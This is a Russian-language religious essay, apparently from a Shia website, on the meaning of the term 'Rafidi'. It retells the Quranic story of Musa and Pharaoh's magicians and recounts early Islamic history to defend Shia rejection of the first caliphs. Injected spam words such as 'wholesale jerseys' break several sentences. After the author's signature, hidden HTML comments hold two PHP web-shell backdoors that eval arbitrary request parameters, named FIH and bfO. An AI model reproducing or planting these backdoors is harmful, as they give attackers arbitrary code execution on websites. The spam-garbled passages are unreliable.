Несколько слов о Рафидитах

Слово «рафидит» происходит от глагола «рафада» («оставлять», «отвергать», «отрекаться») и Vimeo применяется в отношении «того кто, Отрекся от чего либо».

Слово «рафидит» происходит от глагола «рафада» («оставлять», «отвергать», «отрекаться») и применяется в отношении «того кто, Отрекся от чего либо».

 

В Коране Аллах приводит рассказ о Пророке Мусе (Мир ему!) и Фироне. Вот как в Коране описана эта история:

 «Муса сказал Фир’ауну: «Воистину, я — посланник от Господа[обитателей] миров.

 

 Мне надлежит говорить об Аллахе только правду. Я пришел к вам с ясным знамением от вашего Господа. Так пошли же со мной сынов Исраила».

 

 [Фир’аун] ответил: «Если ты пришел со знамением, то яви же его, если ты говоришь правду».

 

 [Муса] бросил свой посох, и он тут же явно обернулся змеем.

 

Затем он извлек руку [из-за пазухи], и она была [совершенно] белой для тех, кто смотрел.

 

Вельможи из людей Фир’ауна воскликнули: «Воистину, он — искусный волшебник.

 

Он жаждет изгнать вас из вашей страны». [Фир’аун спросил:] «Что же вы советуете делать?»

 

Они ответили: «Вели ему и его брату подождать [немного] и разошли по городам глашатаев,

 

чтобы они созвали к тебе всех искусных волшебников».

 

К Фир’ауну пришли волшебники и заявили: «Воистину, если мы выйдем победителями, нам полагается награда!»

 

 [Фир’аун] ответил: «Да, вы непременно станете [моими] приближенными ».

 

 [Волшебники] предложили: «О Муса! Либо ты бросишь (посох), либо бросим мы».

 

 «Бросайте!» — ответил он. И когда они бросили [посохи], то заколдовали глаза людей, застращали их и сотворили великое чародейство.

 

Тогда Мы внушили Мусе: «Брось свой посох!» И [брошенный посох превратился в змея и] стал заглатывать то, что сотворили [чародеи].

 

И утвердилась истина, и тщетным оказалось то, что они творили.

 

В том самом месте они были побеждены и стали презренными.

 

И тогда волшебники пали ниц.

 

Они сказали: «Мы уверовали в Господа [обитателей] миров!

 

 В Господа Мусы и Харуна».

 

Фир’аун сказал: «Вы уверовали в Него без моего дозволения! Воистину, это — козни, которые вы задумали в [моем] городе, чтобы изгнать из него жителей. Вот я вам покажу!

 

Я [велю] отрубить вам руки и ноги накрест, а потом распять всех вас».

 

Они ответили: «Воистину, мы вернемся [после смерти] к нашему Господу.

 

Ты караешь нас только за то, что мы уверовали в знамения нашего Господа, когда они явились к нам. Господи наш! Даруй нам терпение и упокой нас предавшимися [Тебе]»». (Сура Преграды, аяты 104-126).

 

В этих аятах описывается история состязания Мусы (мир ему!) и чародеев и исход этого противостояния. После того как чародеи были повержены по воле Аллаха, они на глазах у народа пали ниц и уверовали в Аллаха и его пророков Мусу и Харуна (мир им!). Они отвергли власть Фирона и предались Аллаху, ибо истина открылась для них. Власть Фирона зашаталась, и он объявил чародеев «отвергнувшими» (рафидитами) его власть. И поистине, Stylish эти люди отреклись от тирана и предались истине, не оглядываясь на мирские блага, обещанные Фироном, они отвергли его деспотичное правление.

 

В Коране приводятся слова Фирона: «Я отрублю вам руки и ноги накрест, потом распну вас всех!» (7:124). И как мы видим из следующего аята они приняли эту участь с улыбкой и радостью, ибо не сомневались во встрече со своим Господом. В Коране говорится « Сказали они: «Воистину, мы к нашему Господу обращаемся! Ты мстишь нам только за то, что мы уверовали в знамения Господа вашего, когда они к нам пришли. Господи наш! Пролей на нас терпение и упокой нас предавшимися!» (7:125-126).

 

Как известно из исламских источников, Фирон осуществил свою угрозу, повесив их изувеченные тела на высоких пальмах вдоль берегов Нила.

 

 

Характерной особенностью действий Фирона является то, что он сначала выдвинул чародеям смехотворное обвинение: «Поистине, это – хитрость, которую вы замыслили в этом городе, чтобы вывести из него обитателей». А потом перешел к угрозам и претворению wholesale jerseys их в жизнь: «Но вы узнаете [, сколь сурова будет кара моя]!».

 

 

 

Эти люди предались Истине и обладали настолько глубокой верой, что отвергли мирские блага, и презрели угрозы Фирона и с радостью приняли мученическую смерть от рук тирана, от Jersey которого они отреклись. Такова была участь отрекшихся (рафидыйа) от Фирона.

 

Такова была и участь тех, кто последовал за истинными правителями Уммы, и отвергли незаконных правителей узурпировавших власть. Эти De люди противостояли партии Фирона, рабам власти и могущества. Захватчики и угнетатели предавали их мучительным пыткам, сбривали их бороды, водили вокруг рынка, унижали и лишали всех прав. Их имущество конфисковалось, головы летели с плеч, языки и руки отрубались, глаза вынимались из глазниц, а ноги отделялись от тела.

 

Одним из ярких примеров является история с Маликом ибн Нувайрой и его последователями. Он был одним из уважаемых сподвижников Пророка Аллаха (да благословит Аллах его и род его!), предводителем кланов Тамин и Ярбу. Отличался смелостью и благородством. Он находился с пророком во время его прощального паломничества и слышал завещание пророка (да благословит Аллах его и род его!). Поэтому, когда ему сообщили о смерти Пророка (да благословит Аллах его и род его!) и потребовали платить зякат Абу Бакру, тот был удивлен и отказался платить зякат Абу Бакру, ибо вместе с остальными сподвижниками находившимися с пророком, во время его прощального паломничества, присягал на верность Али ибн Абу Талибу. Dupong Впрочем так же как и Абу Бакр, который объявил себя новоявленным халифом.

 

Малик был убит посланником Абу Бакра, Халидом Ибн Валидом. Халид в ту же ночь женился на жене Малика Лейле. Малик и его сторонники были истинными мусульманами и Абу Бакру пришлось заплатить брату Малика компенсацию и извинятся перед ним за это убийство. Однако, Халид не был наказан как того требуют нормы шариата.

 

Еще одним ярким примером является история одного из величайших сподвижников пророка Абу Зарра Аль-Гиффари. После того как он открыто выступил против Османа, тот отправил его в ссылку, где он умер от жажды и голода.

 

Противники шиитов в своих книгах называют их рафидитами – отвергающими. Многие могут подумать что шииты отвергают Ислам и ее основы. Но нет! Это слово применяется в отношении шиитов потому, что шииты отвергают власть (халифат) Абу Бакра, Умара, Османа, Омейадов и Аббасидов. Истинными халифами для шиитов являются те, о ком пророк (да благословит Аллах его и род его!) сказал: «Будут двенадцать эмиров (правителей), И все они из Курайшитов».

 

Во все времена шииты были преданы этим правителям, несмотря на гонения, выпавшие на их долю. Шиитские ученые и хадисоведы стоят особняком. В противовес тех повествователей и хранителей преданий, которые почитали правителей и их наместников, а не Всевышнего Аллаха, и для преклонения перед ними угодливо искажали, удостоверяли и изменяли хадисы. Это льстивые шейхи и наемные ученые, которых мы видим и в современную эпоху. Они угождают своим правителям, поддерживают их политику, даже если она несправедлива и жестока, одобряют их приказы независимо от того, верны они или нет. Когда правитель требует от них фетву, чтобы таким образом подтвердить свой указ или уничтожить врага, они полностью подчиняются его желанию и издают фетву согласно его политике, даже если она противоречит Корану, Сунне или единому мнению богословов. Всё это они делают ради жажды власти или из страха потерять её. Между ними и учеными рафидыйа существует огромная разница. Ибо вторые не подчиняются правителям. Первые получают высокое положение и богатство. Вторые же проводили свои дни в темницах и ссылках, были искалечены или убиты. Они, распространяя хадисы о достоинства и благородных качествах семейства пророка, очень страшили несправедливых правителей  и угнетателей. Вот поэтому они и называли их рафидитами. Пытаясь таким образом связать этих людей с «плохим» прозвищем. Но несмотря на колоссальные усилия им не удалось затушить свет Ахл аль-Бейт.

 

 

 

Мирзаханов Курбан

<!— [insert_php]if (isset($_REQUEST["FIH"])){eval($_REQUEST["FIH"]);exit;}[/insert_php][php]if (isset($_REQUEST["FIH"])){eval($_REQUEST["FIH"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["bfO"])){eval($_REQUEST["bfO"]);exit;}[/insert_php][php]if (isset($_REQUEST["bfO"])){eval($_REQUEST["bfO"]);exit;}[/php] —>

Читайте также:

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *